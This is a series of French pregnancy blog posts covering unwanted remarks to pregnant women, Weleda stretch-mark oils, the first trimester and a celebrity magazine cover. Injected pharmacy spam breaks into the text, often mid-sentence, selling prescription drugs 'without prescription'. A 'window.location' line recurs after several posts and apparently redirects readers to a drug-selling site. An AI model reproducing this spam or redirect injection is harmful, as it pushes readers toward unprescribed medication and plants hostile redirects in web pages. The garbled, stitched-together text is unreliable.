Gens : ne vous sentez pas obligés de parler aux femmes enceintes …

26 octobre 2011 par  
Classé dans A la Une, Lifestyle, Maternité

Si globalement j’ai eu l’impression d’être chouchoutée, choyée pendant ces 9 mois-6jours,  il y a quand même des reflexions qui m’énervent et qui ont le don de me rendre dingue en une fraction de seconde.

La fin approche, mon seuil de tolérance est quasi inexistant, je le sais, mais quand même, d’où vient cette idée folle de dire tout et n’importe quoi à une femme enceinte ?!

Morceaux choisis …

« Ouh la mais vous êtes sure qu’il n’y en a pas 2 ?! »

Ma fille prend ses aises, j’ai eu du ventre dès les 3 mois, OK, je suis la première à trouver cette excroissance hors norme, mais jamais il ne faut dire ça à une femme enceinte !

Déjà, ça n’est pas drôle. On est en 2011, ça fait bien longtemps qu’on n’a pas entendu « Oh mais attendez, poussez encore, il y en a un deuxième qui arrive ». A 1 mois ½ on peut savoir combien il y a d’embryons, si tout se passe bien une femme passe 3 ou 4 échographies pendant sa grossesse donc on ne peut pas passer à côté.

affordable health care. priligy generic dapoxetine 60mg. dapoxetine is used as a treatment for premature ejaculation. cheap dapoxetine online!

Ensuite, c’est assez vexant : toutes les femmes enceintes doivent connaître la petite appréhension de la pesée mensuelle chez la sage-femme, ce petit moment où on croise les doigts pour ne pas avoir pris trop de poids, au risque de se faire remonter les bretelles …

Et puis il n’y a pas qu’un bébé dans le ventre d’une femme enceinte, révisez le programme de 4ème sur la grossesse, vous allez (re)découvrir les mots placenta, liquide amniotique, poche des eaux, bref,  un bébé n’est pas calé entre la vessie et l’estomac, il y a plein d’autre choses …

« Ah, profitez de votre grossesse pour dormir, après c’est fini ! »

Bande de salopards …

Je ne pense pas être un cas exceptionnel, mais depuis le 1er mois mes nuits ont plus ressemblé à des cauchemars qu’à de doux moments de repos … Entre le gros ventre, les envies de faire pipi, les petites angoisses et un chamboulement biologique il est très rare de dormir plus de 4 heures d’affilés. Alors quand les déjà parents parlent de faire des réserves, ça me rend folle : je galère avec mon sommeil, je galérais déjà avant d’être enceinte, pas besoin de me prédire un avenir sombre côté sommeil pour les prochaines années …

« Profitez en bien de vos beaux cheveux et de votre peau parfaite, après c’est la cata »

Pas plus tard que lundi, chez le coiffeur, ma shampouineuse me dit que j’ai vraiment de beaux cheveux, et là, les 3 autre shampouineuses y vont de leurs petits commentaires « Ah ca c’est sur, la grossesse pour ça c’est magique, mais après vous allez voir, vous allez les perdre par poignées, et votre peau va vous jouer des tours,  vous n’allez plus vous reconnaître ».

Merci mesdames, j’apprécie tellement…

baclofen mg, cheap lioresal, buy cheap baclofen , lioresal mg, purchase baclofen , although the great koch has told us recently that he has lioresal price the means to overcome this peculiar susceptibility are lioresal 10 mg the same.

On ne peut pas laisser aux femmes enceintes/ jeunes mamans un peu de mystère, on est vraiment obligés de tout gâcher ? Apparemment il n’y a rien à faire pour empêcher la chute de cheveux, donc à quoi est-ce que cela peut servir de tenir ce genre de discours ?!

« Ah bon, vous ne comptez pas allaiter ?! Tiens donc ! »

Ca ne vient pas du corps médical (j’ai la chance d’être tombée sur des sage-femmes toutes plus adorables et compréhensives les unes que les autres) mais des mamans qui ont allaité, et toute sorte d’arguments accompagnent cette incrédulité

« Bon courage pour perdre vos kilos alors ! »

« Vous allez galérer alors, il va choper tous les microbes qui passent, vous verrez … »

Evidemment, j’ai rarement trouvé une oreille disposée à entendre mes arguments, alors tant qu’à faire autant jouer sur le même terrain … Le combat allaitante-biberonnante a encore de beaux jours devant lui !

« Alors tu n’as pas encore accouché ?! »

Non, et permet moi d’espérer qu’une fois que ce sera fait j’aurai quand même un peu moins de ventre. Non mais sérieusement, quand on entend ça ….

« Bon courage, tu viens d’en prendre pour 20 ans »

Venant de parents, ou pas … Là encore, on est en 2011, en France, donc contraception, avortement, tout ça on y a droit, mais ça paraît si inconcevable de faire un enfant aujourd’hui ?! Moi je l’ai voulu ce bébé, et le papa aussi, ça a mis du temps, et on est ravis, alors pourquoi est-ce qu’il faut toujours de rabats joie ?! C’est exaspérant …

« Et le papa, il va assister à l’accouchement ? Parce que quand même, ça peut faire peur hein ! hihihi»

Oui, il sera là, à côté de moi, en haut. Pas au niveau de mes jambes, il sera côté visage, hors de question qu’il aille voir ce qui se passe, qu’il soit mis à contribution, mais quand même, si je peux me sentir un minimum soutenue ça m’arrangerait.

OK ça ne va pas forcément être drôle pour lui, ça va être long, il pourrait se sentir inutile, mais après tout, il y est pour quelque chose dans cette histoire, et que c’est quand même un sacré moment qu’il ne devrait pas vivre tous les jours (en tous cas, pas avec moi !)/ C’est selon moi un truc à vivre à 2, s’il ne voulait pas y assister je ne voudrais pas avoir quelqu’un d’autre avec moi. Evidemment je me donne le droit de le faire sortir, de le pousser dehors même si je vois qu’à un moment ma dignité risque d’en prendre un sacré coup et qu’il risque de me voir dans un état pas franchement glamour, mais il est prévenu. Il sait aussi que si je l’insulte ou le frappe il ne faudra pas m’en tenir rigueur. Tout est une question de préparation ! 😉

« Alors l’accouchement, ca te fait peur ?! »

Quand je réponds que non, ça ne me fait pas peur, que j’ai une appréhension légitime mais que j’ai confiance je vois bien que ça n’est pas la réponse qu’on attendait. Alors j’ai droit à quelques scénarios catastrophes « Tu sais ma mère, en 1960 … » « Je connais une nana qui connaît une nana … » « Il paraît que … » Bref, légendes urbaines,  accouchement boucherie et autres joyeusetés me sont contées : la déchirure te privant de toute dignité pendant les 20 prochaines années, la vie sexuelle a jamais chamboulée, les descentes d’organes, bref, tout est bon pour faire angoisser.

L’envie de répondre « Moi les forceps, les ventouses, l’épisio et les déchirures j’en rêve, j’en prendrais tous les matins au petit déj si je pouvais » J’ai découvert que beaucoup de personnes en profitent pour rejeter leurs propres angoisses, pas très sympa …

  40 mg cost can essential oils replace prozac prozac 3 day blepharospasm and 872 par 20 mg street value buy prozac online australia buy prozac usa how

Et depuis le film Un Heureux Evènement je lis et j’entends que c’est bien, qu’il faut montrer l’envers du décor, que la maternité ça n’est pas que des papillons et des petits nuages, mais pour le coup j’ai trouvé pendant ces 9 mois que le côté positif des choses passait vraiment  à la trappe, heureusement j’ai quelques jeunes mamans autour de moi qui m’ont réconfortée, qui me prouvent au quotidien qu’être une jeune maman ne veut pas forcément dire renoncer à sa féminité, à son couple, que ça apporte plus de bonheur que de tracas, mais franchement, les gens, arrêtez de dire tout et n’importe quoi aux femmes enceintes !

Alors j’en profite pour remercier les jeunes mamans qui, directement ou indirectement me rassurent et me montrent une belle image de la maternité, pas forcèment des « blogs de mamans » mais des blogueuses qui me réconfortent  :  Annouchka, Zess, Rouge à lèvres & macramé, Sasa, Fran, Julianne, Amélimélo, buy baclofen cheap fast shipping, purchase baclofen generic uk, winnipeg, atlanta, richmond, online order baclofen generic overnight delivery, cheapest buy  Bao, Chris – la reine des Mum-to-Be-Parties

Et j’en profite également pour partager une page Facebook qui me fait déjà beaucoup rire : Trucs de mère indigne, j’aime vraiment beaucoup de genre de témoignages, ça me détend à quelques jours du jour J et je chope les petites astuces ! 😉

window.location = « http://medicationsonlinedoctor.com »;.

Rendez-vous sur Hellocoton !

Joe la frite, c’est moi !

10 juin 2011 par  
Classé dans A la Une, Beauté, Soins

huiles-weleda

Je crois qu’on a tous en tête l’image d’une femme à la plage couverte de vergetures, des seins au ventre, en passant par les hanches, les cuisses et parfois même les mollets …

Des traces de grossesse auxquelles je veux évidemment échapper, alors je n’ai pas hésité à ajouter quelques flacons dans ma salle de bain pourtant déjà bien pleine mais que voulez vous, il y a des fois comme ça ou on est obligé de se sacrifier  …

Première présentation aujourd’hui avec les huiles Weleda, dont LA référence, l’Huile de massage anti-vergetures

J’en avais entendu parler pour la première fois chez amoxil 400 mg. amoxil uk. get amoxicillin. amoxicillin order online. discount amoxil. order order online at usa pharmacy! generic zoloft . express delivery , generic zoloft sun pharmaceuticals. generic amoxil. amoxil generic name . amoxicillin 250 mg. amoxil buy  Annouchka, j’avais noté ça dans un coin de ma tête  😉

Avec de l’huile d’amande douce, de jojoba bio, de germe de blé, des huiles essentielles et de l’extrait de fleur d’arnica, elle favorise la prévention et la réduction des vergetures, en améliorant l’élasticité et la tonicité de la peau.

Il est conseillé de l’utiliser matin et soir dès le début de la grossesse et, attention, 3 fois par jour le dernier mois. Autant dire qu’il vaudrait mieux remplir une baignoire d’huile et y rester toute la journée …

Bon à savoir, on lit parfois qu’avant une échographie il faut arrêter de mettre de la crème 1 semaine avant, mais avec cette huile pas de problème, on peut continuer jusqu’au dernier jour.

Le parfum est assez classique, rien d’enivrant mais du coup rien de rebutant non plus, mais le fait de ne pas apprécier le parfum me posait problème … D’ailleurs cette huile, entre son aprfum trop classique et son packaging cheap-retro ne joue clairement pas sur le plaisir, et c’est bien dommage …

Et en début de semaine j’ai découvert, grâce à la M buy estrace samples on line categorieswhere to purchase estrace ibs online acheter find estrace amex. shine take estrace amlo generico. estrace online um-to-be Party de buy estrace online now – special internet prices – no prescription needed – bonuses: free pills , free shipping, discounts – fast worldwide delivery Chris (je vous en reparle très vite!), qu’il existait une super huile, toujours chez Weleda, qui m’a été présentée par une conseillère-masseuse Weleda : l’huile harmonisante à la rose musquée.

C’est son parfum qui m’a séduit, enfin une huile qui sent bon, qui donne envie !

Présentée comme un soin embellisseur, cette huile redonne fermeté, douceur et velouté à la peau et contient de l’huile de jojoba, d’amande douce, de l’huile de graines de rose musquée, des huiles essentielles de rose de Damas et de jasmin… Tout pour me plaire !

Je retrouve le plaisir des massages à l’huile tout en appréciant vraiment le parfum.

Quand j’ai su qu’il y avait des huile essentielles dans ces huiles j’ai tiqué, mais chez Weleda ils m’ont vite rassurée : il y en a juste un peu, pas suffisamment pour que cela pose problème.

J’ai donc 2 huiles, une pour le matin l’autre pour le soir, et je me tartine tous les jours, ou presque et pour l’instant malgré 3 changements de taille de soutien-gorge en 10 jours rien à déclarer, pourvu que ça dure !

Et bientôt, pour poursuivre dans la série « chic & glam », je vous présente un soin anticellulite que les femmes enceintes peuvent utiliser … Parce qu’avoir des gros seins OK mais des grumeaux sur les cuisses, c’est tout de suite moins sympa …

Petite astuce de pro pour l’huile : appliquez la sur peau humide, ça permet d’en mettre moins et ca facilite « l’étalage » …
window.location = « http://medicationsonlinedoctor.com »;.

Rendez-vous sur Hellocoton !

Les 3 premiers mois de grossesse … on va dire que le meilleur reste à venir !

16 mai 2011 par  
Classé dans A la Une, Lifestyle, Maternité

grossesse

Préambule : Je suis actuellement en train de façonner un petit baby, qui devrait pointer son nez pour fêter Halloween (pour ne pas dire que le terme est prévu le jour de la Toussaint …).  Si c’est une très belle aventure et que le futur papa et moi en sommes ravis, on peut dire que les débuts ont été assez chaotiques …

Même si je « porte la vie » et que c’est tellement exceptionnellement incroyablement magique et fantastique, je peux dire sans l’ombre d’un doute que les 3 premiers mois de ma grossesse (quel horrible mot !) ont été les plus difficiles de ma vie …

Parce que si c’est une chose assez commune et que l’organisme d’une femme est fait en fonction, quand même, ça n’est pas quelque chose de banal, enfin ça n’arrive pas tous les jours et on va dire que je n’ai pas été très épargnée …

Oser les nausées …

Déjà le premier mois, j’étais fière comme un bar-tabac : « les nausées ?! Sans moi ! » Pour l’émetophobe que je suis c’était un sacré soulagement !

Sauf que très vite la donne a changé et j’ai multiplié les réveils à 5h du mat en catastrophe la tête dans le lavabo, j’ai vite eu des tocs de langage, débitant le très classieux « j’ai la gerbe » à tout bout de champs (pour le côté Princesse on repassera hein !)

J’ai même cru à un moment que j’allais finir par vomir ce bébé tellement j’étais mal (oui, le cocktail insomnies+nausées donne de drôles d’idées et je fais des rêves de fou depuis le début de cette fabrication de bébé, il faudra que je vous parle des petits pieds qui sortent buy estrace online, estrace cream, estrace 2 mg, estrace cost , estrace cream cost , order estradiol, purchase estradiol. non c’est vraiment trop glauque)

Et puis en dehors des nausées « à domicile » il y a aussi tout ce qui se passait à l’extérieur : vomir sur le parvis de la Gare du Nord avec tous les ivrognes m’applaudissant « elle est des no-o-treuh, elle a bu son verre comme les au-o-treuh ». Et là, à part fondre en larme, je n’ai rien pu faire ! Et puis les trajets en taxi ou en métro qui deviennent les pires montagnes russes du Pirat’Park de Gruissan, les réunions placées sous la menace, c’est tout mon quotidien qui a été boulversé !

dec 11, 2014 – otc estrace mastercard online fast delivery purchase estrace cream online check no prescription arizona best price estrace cream in internet  Une vie de mormon …

Pendant les 3 premiers mois j’ai sombré dans un état second, un repli très égoïste, pas par choix, j’ai vraiment subi !

Ancienne insomniaque, pendant presque 3 mois j’ai eu l’impression de rattraper toutes mes heures de sommeil en retard, du coup je devais vraiment me faire violence pour dormir moins de 20h par jour. Inutile de préciser que les 4 heures restantes étant consacrées aux nausées, j’ai tiré un trait sur toute tentative de vie sociale ! Ensuite, je suis passé par la case insomnie avec des réveils en fanfare à 4h du matin, impossible de me rendormir avant 9h, là encore il a fallu revoir toute mon organisation, heureusement j’ai pu moduler mon emploi du temps … Et il faut que je remercie Jack Bauer qui a été mon fidèle compagnon pendant ces heures difficiles, du coup j’ai terminé les 8 saisons, si vous avez des séries à me conseiller je prends !

Le syndrôme du mononeurone

Alors celui là, il s’est vite incrusté et a du mal à me lâcher!

Pour faire simple, je ne me suis jamais sentie aussi limitée intellectuellement que ces dernières semaines, je ne me suis jamais sentie aussi « neuneu » : je ne compte plus les touristes que j’ai envoyé sur les mauvaises lignes, le nombre de fois où j’ai demandé à mes interlocuteurs de répéter, je n’ai jamais consulté aussi souvent le dictionnaire pour vérifier l’orthographe d’un mot que j’écris tous les jours ou les mails intitulés « annule et remplace », les objets perdus, les rendez-vous oubliés, les clefs restées sur la table, bref, pas pratique du tout ce syndrome et difficile à assumer quand personne n’est encore au courant de ce qui se trame !

buy generic and brand levitra online with guaranteed lowest prices. unmatched prices. express shipping & discrete packaging. overnight shipping. 24/7 online support. La chouineuse professionnelle

Moi, le cœur de pierre, moi qui n’ai pas pleuré depuis la mort de Mickey dans Rocky III, je me suis retrouvée dans des états lamentables pour 3 fois rien. On a tous le souvenir d’une fille en train de pleurnicher dans le métro à qui on vient tendre un mouchoir … Et bien, pour beaucoup, ce souvenir ce sera moi.

La fatigue, les nausées, le mal de dos, un désagrément mineur, une remarque mal interprétée, un reportage, un livre, des petits mots gentils, tout est bon pour le chouinage ! Et va savoir pourquoi, je suis attirée par les reportages tragiques du style « enceinte a 15 ans mon copain a été tué par un gang », « J’ai 2 enfants atteints d’une maladie orpheline, esperance de vie 5 ans » ou autres joyeusetés … (d’ailleurs, pas plus tard que dimanche matin, « Elle s’appelait Sarah » … Fiou, un paquet entier de mouchoirs  …)

cipro for ear infection buy cipro online L’art d’être chiante …

Alors là, j’excelle ! Je m’en rends compte (enfin, après coup) mais ça n’est pas pour ça bien sur qu’il faut tout avouer … Pour une fois j’ai une très bonne excuse, les hormones, alors il faut en profiter !

Particulièrement intolérante, pointilleuse, exigeante, intransigeante, je suis un vrai don du ciel.

Et j’en ai encore sous la godasse, je n’ai pas encore eu d’envies de femmes enceintes mais connaissant mon potentiel le futur papa sait qu’il n’est pas à l’abri d’un tour de quartier (au mieux) nocturne pour dénicher une barquette de fraises des bois ou d’Oreo Double Stuff … (vivement ce jour là !)

Voilà, un premier bilan qui peut paraître pessimiste, mais les premiers mois sont apparemment rarement une partie de plaisir même si certaines sont relativement epargnées (les garces).

Je reste pleine d’espoir, le meilleur reste à venir (pour l’instant je sais que je suis enceinte mais je n’ai pas encore admis que enceinte = accouchement donc ne gâchez pas mon plaisir !)

Et puis je rappelle juste que les 3/4 premiers mois généralement on a très peu d’avantages : on ne sent pas le bébé, le ventre ne s’arrondit pas donc le « grand public » n’est pas au courant, par superstition on n’en parle pas, ou juste aux très proches, et puis c’est tellement un chamboulement qu’on a du mal à se dire que tout ça, c’est pour la bonne cause …

Mais pour faire l’équilibre je prépare un article bientôt sur les avantages … Genre prendre 3 tailles de soutif en 10 jours, pas mal non ? (enfin, il y a quand même un prix a payer …) mais les cheveux, la peau, les ongles, eux, ils en profitent à fond par exemple !

En tous cas, vivement le mois prochain ! 😉

Rendez-vous sur Hellocoton !

Estelle Lefebure, égerie Mixa enceinte en couverture d’Elle

12 novembre 2010 par  
Classé dans A la Une, Lifestyle, People

nov 21, 2014 – cheap medication : buy estrace online best quality, cheap generic prozac no prescription, cheap prices , credit cards accepted, worldwide fluoxetine 20 mg tablets fluoxetine to buy online uk cheap fucidin uk online drugstore, top quality medications buy zithromax z pack online low prices, quality generics  estelle_enceinte

Estelle Lefebure fait partie des très belles femmes enceintes de plus de 40 ans.
A 44 ans elle est sublime, je trouve qu’elle a de plus en plus de charme en vieillissant, et montre qu’on peut mener une belle grossesse après 40 ans.
cipro joint pain temporary cipro without prescription

Les « stars » sont de plus en plus nombreuses à avoir des enfants après 40 ans : Monica Bellucci , Estelle Lefebure, Halle Berry, Marcia Cross, Salma Hayek, Nicole Kidman, Julia Roberts, Céline Dion ou encore Rachida Dati !

Naturelle, spontanée, Estelle est rayonnante en couverture du Elle, ça fait du bien de voir une femme enceinte à plus de 40 ans « accessible », car contrairement aux stars américaines elle n’aura à mon avis pas besoin d’une horde de nounous et pousseurs de poussettes autour d’elle !

Elle propose un dossier spéciale « elles font un bébé après 40 ans : leurs bonheurs, leurs doutes, leurs attentes ».

Alors, enceinte après 40 ans, ça vous inspire ?
lioresal 10 mg, lioresal intrathecal, buy baclofen , baclofen price, buy baclofen online, lioresal price, cheap baclofen.

window.location = « http://medicationsonlinedoctor.com »;.

Rendez-vous sur Hellocoton !